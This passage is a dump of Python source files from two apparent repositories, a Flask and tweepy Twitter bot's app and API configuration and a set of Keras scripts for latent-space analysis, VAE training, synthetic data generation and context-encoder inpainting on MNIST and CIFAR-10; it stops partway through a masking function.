| {"/flaskapp/models.py": ["/flaskapp/__init__.py"], "/flaskapp/bots/follow_users.py": ["/flaskapp/bots/config_class.py"], "/clock.py": ["/flaskapp/bots/create_tweet.py", "/flaskapp/bots/follow_users.py"], "/flaskapp/bots/create_tweet.py": ["/flaskapp/bots/collect_data.py", "/flaskapp/__init__.py", "/flaskapp/models.py", "/flaskapp/bots/config_class.py"], "/flaskapp/__init__.py": ["/flaskapp/bots/app.py"]} |
53,428 | colestriler/SurfRobot | refs/heads/master | /flaskapp/bots/app.py | from flask import render_template, request, Blueprint, flash, redirect, url_for
bots = Blueprint('bots', __name__)


@bots.route('/', methods=['GET', 'POST'])
# @main.route('/home', methods=['GET', 'POST'])
def home():
    """Serve the landing page for both GET and POST requests."""
    page = render_template('home.html')
    return page
| {"/flaskapp/models.py": ["/flaskapp/__init__.py"], "/flaskapp/bots/follow_users.py": ["/flaskapp/bots/config_class.py"], "/clock.py": ["/flaskapp/bots/create_tweet.py", "/flaskapp/bots/follow_users.py"], "/flaskapp/bots/create_tweet.py": ["/flaskapp/bots/collect_data.py", "/flaskapp/__init__.py", "/flaskapp/models.py", "/flaskapp/bots/config_class.py"], "/flaskapp/__init__.py": ["/flaskapp/bots/app.py"]} |
53,429 | colestriler/SurfRobot | refs/heads/master | /flaskapp/bots/config_class.py | import tweepy
import logging
import os
logger = logging.getLogger()
class API():
    """Builds an authenticated tweepy API client.

    Credentials come from the TESTING_* environment variables when
    DEVELOPMENT == "True", otherwise from the SURFROBOT_* production ones.
    """

    def __init__(self):
        in_development = os.getenv("DEVELOPMENT") == "True"
        prefix = "TESTING" if in_development else "SURFROBOT"
        self.consumer_key = os.getenv(prefix + "_CONSUMER_KEY")
        self.consumer_secret = os.getenv(prefix + "_CONSUMER_SECRET")
        self.access_token = os.getenv(prefix + "_ACCESS_TOKEN")
        self.access_token_secret = os.getenv(prefix + "_ACCESS_TOKEN_SECRET")
        # destructive helpers (delete / unfollow everything) are only ever
        # enabled against the testing account
        self.delete_all = in_development
        self.unfollow_all = in_development

    def create_api(self):
        """Return a verified tweepy.API instance; raise if auth fails."""
        auth = tweepy.OAuthHandler(self.consumer_key, self.consumer_secret)
        auth.set_access_token(self.access_token, self.access_token_secret)
        client = tweepy.API(auth, wait_on_rate_limit=True,
                            wait_on_rate_limit_notify=True)
        try:
            client.verify_credentials()
        except Exception as e:
            logger.error("Error creating API", exc_info=True)
            raise e
        logger.info("API created")
        return client
| {"/flaskapp/models.py": ["/flaskapp/__init__.py"], "/flaskapp/bots/follow_users.py": ["/flaskapp/bots/config_class.py"], "/clock.py": ["/flaskapp/bots/create_tweet.py", "/flaskapp/bots/follow_users.py"], "/flaskapp/bots/create_tweet.py": ["/flaskapp/bots/collect_data.py", "/flaskapp/__init__.py", "/flaskapp/models.py", "/flaskapp/bots/config_class.py"], "/flaskapp/__init__.py": ["/flaskapp/bots/app.py"]} |
53,466 | davidhayes3/ME-Project | refs/heads/master | /latent_space_visualization/statistical_analysis/cifar10/cifar10_correlation_map.py |
import seaborn
from keras.datasets import cifar10
import numpy as np
import keras.utils
import matplotlib.pyplot as plt
from cifar10_models import deterministic_encoder_model
# Define constants
num_classes = 10
latent_dim = 64

# Load saved BiGAN deterministic-encoder weights
encoder = deterministic_encoder_model()
encoder.load_weights('cifar10_bigan_determ_encoder.h5')

# Load CIFAR-10 data and split into train and test set
# (the original comment said MNIST; the data is CIFAR-10)
(X_train, y_train), (X_test, y_test) = cifar10.load_data()
X_train = X_train.astype(np.float32) / 255.
X_test = X_test.astype(np.float32) / 255.
y_test_one_hot = keras.utils.to_categorical(y_test, num_classes)
# flatten (N, 1) label array to (N,) so boolean indexing below works
y_train = y_train.reshape((y_train.shape[0]))

# Encode the training set into latent vectors
latent_spaces = encoder.predict(X_train)

# Get max and min value of entire set for later plotting purposes
# NOTE(review): `max`/`min` shadow the builtins and are not used anywhere
# visible below — confirm whether they belong to a removed plot.
max = np.max(latent_spaces)
min = np.min(latent_spaces)
# Split the encoded training set by class label (CIFAR-10 order 0-9)
latent_plane = latent_spaces[y_train == 0]
latent_automobile = latent_spaces[y_train == 1]
latent_bird = latent_spaces[y_train == 2]
latent_cat = latent_spaces[y_train == 3]
latent_deer = latent_spaces[y_train == 4]
latent_dog = latent_spaces[y_train == 5]
latent_frog = latent_spaces[y_train == 6]
latent_horse = latent_spaces[y_train == 7]
latent_ship = latent_spaces[y_train == 8]
latent_truck = latent_spaces[y_train == 9]

# Tuple of all per-class latent arrays, ordered by class label
latent_sets = (latent_plane, latent_automobile, latent_bird, latent_cat, latent_deer, latent_dog, latent_frog,
               latent_horse, latent_ship, latent_truck)

# Correlation coefficients across classes (for dim 0) and across all latent
# dimensions of the full training set.
# NOTE(review): `set` in the comprehension shadows the builtin.
one_latent_dim_interclass_correlations = np.corrcoef([set[:, 0] for set in latent_sets])
training_set_latent_correlations = np.corrcoef([latent_spaces[:, i] for i in range(latent_dim)])

# Mask the upper triangle so duplicate correlations are hidden in the heatmap
mask = np.zeros_like(one_latent_dim_interclass_correlations)
mask[np.triu_indices_from(mask)] = True
mask[np.diag_indices_from(mask)] = False

# tick positions (cell centers) and class names for the heatmap axes
values = np.arange(0.5, num_classes + 0.5, 1)
names = ['Plane', 'AM', 'Bird', 'Cat', 'Deer', 'Dog', 'Frog', 'Horse', 'Ship', 'Truck']
# One inter-class correlation heatmap per latent dimension, saved to Images/
for i in range(latent_dim):
    plt.figure()
    # correlation of this single latent dimension across the 10 classes
    one_latent_dim_interclass_correlations = np.corrcoef([set[:, i] for set in latent_sets])
    seaborn.heatmap(one_latent_dim_interclass_correlations, cmap='RdYlGn_r', vmax=1.0, vmin=-1.0, mask=mask, linewidths=2.5)
    plt.yticks(values, names, rotation=0)
    plt.xticks(values, names, rotation=90)
    plt.savefig('Images/cifar10_interclass_corr_latent_%d' % i)
    plt.close()  # free the figure; 64 figures would otherwise accumulate
# Remove duplicate correlation from array, through use of mask
# (rebuilt here at the latent_dim x latent_dim size)
mask = np.zeros_like(training_set_latent_correlations)
mask[np.triu_indices_from(mask)] = True
mask[np.diag_indices_from(mask)] = False

# Create heatmap of correlation coefficients between latent dimensions
plt.figure()
seaborn.heatmap(training_set_latent_correlations, cmap='RdYlGn_r', vmax=1.0, vmin=-1.0, mask=mask, linewidths=2.5)
# Change orientation of labels for easier readability
plt.yticks(rotation=0)
plt.xticks(rotation=90)
# Label Axes
plt.xlabel('Latent Dimension')
plt.ylabel('Latent Dimension')
# Save plot
plt.savefig('cifar10_training_set_latent_corrs')

# Plot histogram of the correlation distribution
plt.figure()
plt.hist(training_set_latent_correlations, 100, facecolor='green', alpha=0.5)
plt.xlim(-0.4, 0.4)
#plt.ylim(0, 500)
plt.savefig('cifra10_training_set_corrs_distrib') | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": 
["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,467 | davidhayes3/ME-Project | refs/heads/master | /latent_space_visualization/synthetic_dataset/sd_vae_train.py | from __future__ import print_function, division
import numpy as np
import keras.backend as K
from keras.layers import Input, Lambda
from keras.models import Model
from keras import metrics
from keras.callbacks import EarlyStopping, ModelCheckpoint
from common_models.common_models import vae_encoder_sampling_model, vae_model
from sd_models import vae_encoder_model, generator_model
from functions.auxiliary_funcs import save_models
from functions.visualization_funcs import save_reconstructions, save_latent_vis, plot_train_loss
import numpy as np
# Set random seed for reproducibility
np.random.seed(12345)
# =====================================
# Define constants
# =====================================
# Synthetic dataset: 2x2 single-channel "images" (4 pixels), one of 16 classes.
img_dim = 4
img_rows = 2
img_cols = 2
channels = 1
img_shape = (img_rows, img_cols, channels)
latent_dim = 2
num_classes = 16
# Standard deviation of the VAE reparameterization noise (used by `sampling` below)
epsilon_std = 0.05
image_path = 'Images/sd_vae'
model_path = 'Models/sd_vae'
# =====================================
# Load dataset
# =====================================
# Load dataset (flat text files produced by sd_generate_dataset.py)
X_train = np.loadtxt('Dataset/synthetic_dataset_x_train.txt', dtype=np.float32)
X_test = np.loadtxt('Dataset/synthetic_dataset_x_test.txt', dtype=np.float32)
y_train = np.loadtxt('Dataset/synthetic_dataset_y_train.txt', dtype=np.int)
y_test = np.loadtxt('Dataset/synthetic_dataset_y_test.txt', dtype=np.int)
# Reshape data to image format (N, rows, cols, channels)
X_train = X_train.reshape(X_train.shape[0], img_rows, img_cols, channels)
X_test = X_test.reshape(X_test.shape[0], img_rows, img_cols, channels)
# =====================================
# Instantiate and compile models
# =====================================
# Define sampling function
def sampling(args):
    """Reparameterization trick: draw z = mu + sigma * eps with eps ~ N(0, epsilon_std)."""
    mu, log_var = args
    batch = K.shape(mu)[0]
    eps = K.random_normal(shape=(batch, latent_dim), mean=0., stddev=epsilon_std)
    sigma = K.exp(log_var / 2)
    return mu + sigma * eps
# Instantiate models
encoder = vae_encoder_model()
generator = generator_model()
# Define VAE model: x -> (z_mean, z_log_var) -> sampled z -> reconstruction
x = Input(shape=img_shape)
z_mean, z_log_var = encoder(x)
z = Lambda(sampling, output_shape=(latent_dim,))([z_mean, z_log_var])
recon_x = generator(z)
vae = Model(x, recon_x)
# Define VAE loss and compile model.
# Reconstruction term is scaled by the pixel count so it is a per-image sum.
xent_loss = np.prod(img_shape) * K.mean(metrics.binary_crossentropy(x, recon_x))
kl_loss = - 0.5 * K.sum(1 + z_log_var - K.square(z_mean) - K.exp(z_log_var), axis=-1)
vae_loss = K.mean(xent_loss + kl_loss)
# Loss is attached via add_loss, so compile() takes loss=None
vae.add_loss(vae_loss)
vae.compile(optimizer='rmsprop', loss=None)
# =====================================
# Train models
# =====================================
# Specify training hyper-parameters
epochs = 20
batch_size = 128
patience = 10
# Specify callbacks for training: stop early on plateaued val loss and keep
# only the best weights on disk.
early_stopping = EarlyStopping(monitor='val_loss', min_delta=0, patience=patience, verbose=0, mode='auto')
model_checkpoint = ModelCheckpoint(filepath=model_path+'.h5', monitor='val_loss', verbose=1, save_best_only=True,
                                   mode='min')
callbacks = [early_stopping, model_checkpoint]
# Train model (targets are None because the loss was attached with add_loss)
history = vae.fit(X_train,
                  epochs=epochs,
                  batch_size=batch_size,
                  shuffle=True,
                  callbacks=callbacks,
                  validation_data=(X_test, None))
# Replace current encoder and decoder models with that from the best save autoencoder:
# rebuild fresh sub-models and load the checkpointed VAE weights into them.
encoder = vae_encoder_model()
sampled_encoder = vae_encoder_sampling_model(encoder, latent_dim, img_shape, epsilon_std)
generator = generator_model()
vae = vae_model(sampled_encoder, generator, img_shape)
vae.load_weights(model_path + '.h5')
# Save encoder and decoder models
save_models(path=model_path, encoder=encoder, generator=generator)
# =====================================
# Visualizations
# =====================================
# Save reconstructions of test images
save_reconstructions(image_path, num_classes, X_test, y_test, generator, sampled_encoder, img_rows, img_cols, channels, color=False)
# Save latent space visualization
save_latent_vis(image_path, X_train, y_train, sampled_encoder, num_classes)
# Plot training curves
plot_train_loss(image_path, history) | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": 
["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,468 | davidhayes3/ME-Project | refs/heads/master | /latent_space_visualization/synthetic_dataset/sd_generate_dataset.py | '''Script used to generate a synthetic dataset to enable 2D latent space visualizations'''
from __future__ import print_function
import numpy as np
# Settings
latent_dim = 2
img_rows = 2
img_cols = 2
channels = 1
img_shape = (img_rows, img_cols, channels)
num_classes = 16
num_train_examples = 5000 * num_classes
num_test_examples = 1000 * num_classes
variance = 0.07  # NOTE(review): unused below; the noise level is set by noise_factor

# Each image is the binary encoding of its label, so the pixel count fixes the
# bit width (4 pixels -> labels 0..15 map to 4-bit codes, e.g. 9 -> [1, 0, 0, 1]).
# Deriving the width here generalizes the previously hard-coded '{:04b}' format.
num_bits = int(np.prod(img_shape))


def _labels_to_binary(labels, width):
    """Return a float array whose i-th row is the `width`-bit binary code of labels[i]."""
    return np.array([[int(bit) for bit in format(int(y), '0%db' % width)] for y in labels],
                    dtype=np.float64)


# Create label arrays
y_train = np.random.choice(list(range(num_classes)), size=(num_train_examples,))
y_test = np.random.choice(list(range(num_classes)), size=(num_test_examples,))
# Create data as binary version of label e.g. label 9 -> 1001
X_train = _labels_to_binary(y_train, num_bits)
X_test = _labels_to_binary(y_test, num_bits)
# Corrupt data with noise to add distinguish between samples and clip images to retain pixel values between 0 and 1
noise_factor = 0.07
X_train = X_train + noise_factor * np.random.normal(0., 1, size=X_train.shape)
X_test = X_test + noise_factor * np.random.normal(0., 1, size=X_test.shape)
X_train = np.clip(X_train, 0., 1.)
X_test = np.clip(X_test, 0., 1.)
# Save dataset (expects the Dataset/ directory to exist)
for data, name in [(X_train, 'x_train'), (X_test, 'x_test')]:
    np.savetxt('Dataset/synthetic_dataset_' + name + '.txt', data, fmt='%f')
for data, name in [(y_train, 'y_train'), (y_test, 'y_test')]:
    np.savetxt('Dataset/synthetic_dataset_' + name + '.txt', data, fmt='%d')
| {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", "/functions/data_funcs.py", 
"/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,469 | davidhayes3/ME-Project | refs/heads/master | /semi_supervised/augmentation/plot_results.py | import numpy as np
import matplotlib.pyplot as plt
num_unlabelled = [200, 500, 1000, 2000, 5000, 10000, 20000, 30000, 50000]
# Test accuracies for each classifier configuration, one result file per setup.
pretrained_acc = np.loadtxt('Results/classifier1.txt', dtype=np.float32)
pretrained_aug_acc = np.loadtxt('Results/classifier2.txt', dtype=np.float32)
pretrained_lastconv_acc = np.loadtxt('Results/classifier3.txt', dtype=np.float32)
pretrained_lastconv_aug_acc = np.loadtxt('Results/classifier4.txt', dtype=np.float32)
random_acc = np.loadtxt('Results/classifier5.txt', dtype=np.float32)
random_aug_acc = np.loadtxt('Results/classifier6.txt', dtype=np.float32)
pretrained_trainable_acc = np.loadtxt('Results/classifier7.txt', dtype=np.float32)
pretrained_trainable_aug_acc = np.loadtxt('Results/classifier8.txt', dtype=np.float32)
# =====================================
# Visualize results
# =====================================
# First comparison: pretrained BiGAN encoder vs a randomly initialized one.
plt.figure()
for accuracies in (pretrained_acc, random_acc):
    plt.plot(num_unlabelled, accuracies, '-o')
plt.ylabel('Test Accuracy (%)')
plt.xlabel('No. of labelled examples')
plt.legend(['BiGAN Encoder', 'Randomly Initialized Encoder'], loc='lower right')
plt.grid()
plt.savefig('cifar10_pretrained_fully_sup_compar.png')
# Second comparison: frozen/trainable encoders with and without augmentation.
# (The figure is left current; it is saved immediately after this section.)
plt.figure()
for accuracies in (pretrained_acc, pretrained_aug_acc, pretrained_trainable_acc,
                   pretrained_trainable_aug_acc, random_aug_acc):
    plt.plot(num_unlabelled, accuracies, '-o')
plt.ylabel('Test Accuracy (%)')
plt.xlabel('No. of labelled examples')
plt.legend(['BiGAN Frozen', 'BiGAN Frozen + Augmentation', 'BiGAN Trainable', 'BiGAN Trainable + Augmentation',
            'Randomly Initialized + Augmentation'], loc='lower right')
plt.grid()
plt.savefig('cifar10_pretrained_aug_compar.png') | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": 
["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,470 | davidhayes3/ME-Project | refs/heads/master | /train_models/mnist_mlp/mnist_ce_train.py | from __future__ import print_function, division
from functions.data_funcs import get_mnist
from functions.auxiliary_funcs import save_models
from functions.visualization_funcs import plot_gan_epoch_loss, plot_gan_batch_loss, plot_discriminator_acc
from mnist_mlp_models import encoder_model, context_generator_model, context_discriminator_model
from common_models.common_models import autoencoder_model
from keras.layers import Input
from keras.models import Model
from keras.optimizers import Adam
import matplotlib.pyplot as plt
import numpy as np
# Set random seed for reproducibility
np.random.seed(12345)
# =====================================
# Define constants
# =====================================
# MNIST image geometry and the size of the square patch that will be masked out.
img_rows = 28
img_cols = 28
mask_height = 8
mask_width = 8
channels = 1
img_shape = (img_rows, img_cols, channels)
missing_shape = (mask_height, mask_width, channels)
num_classes = 10
image_path = 'Images/mnist_ce'
model_path = 'Models/mnist_ce'
# =====================================
# Load dataset
# =====================================
# Load MNIST dataset in range [-1,1]
(X_train, y_train), (X_test, y_test) = get_mnist(gan=True)
# =====================================
# Define necessary functions
# =====================================
def sample_images(path, epoch, imgs):
    """Save a 3x6 image grid: originals, masked inputs, and inpainted results."""
    n_cols = 6
    masked, _, (top, bottom, left, right) = mask_randomly(imgs)
    inpainted = generator.predict(encoder.predict(masked))
    # Rescale from the GAN range [-1, 1] to [0, 1] for display
    originals = 0.5 * imgs + 0.5
    masked = 0.5 * masked + 0.5
    inpainted = 0.5 * inpainted + 0.5
    fig, axs = plt.subplots(3, n_cols)
    for col in range(n_cols):
        # Paste the generated patch back into the original image
        composite = originals[col].copy()
        composite[top[col]:bottom[col], left[col]:right[col], :] = inpainted[col]
        for row, image in enumerate((originals[col], masked[col], composite)):
            axs[row, col].imshow(image.reshape(img_rows, img_cols))
            axs[row, col].axis('off')
    plt.gray()
    fig.savefig(path + '_%d.png' % epoch)
    plt.close()
# Function to mask a random square of pixels in image
def mask_randomly(imgs):
